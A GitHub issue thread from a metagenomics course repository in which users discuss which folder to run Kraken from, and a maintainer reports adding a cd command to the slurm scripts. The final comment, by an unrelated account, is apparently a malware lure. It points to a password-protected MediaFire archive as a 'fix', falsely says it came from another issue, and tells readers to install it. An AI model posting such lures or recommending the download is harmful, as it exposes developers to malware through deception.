### ISSUE TITLE
Kraken notes

### ISSUE THREAD

**Issue by anniewest** [GenomicsAotearoa/metagenomics_summer_school#82]
Are we still working in 4.evaluation for running kraken? If so, I think we should say in the notes that we are running this from the 4.evaluation folder.

**Comment by JSBoey** [comment]
Added `cd /nesi/nobackup/nesi02659/MGSS_U/<YOUR FOLDER>/4.evaluation/` to slurm scripts

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
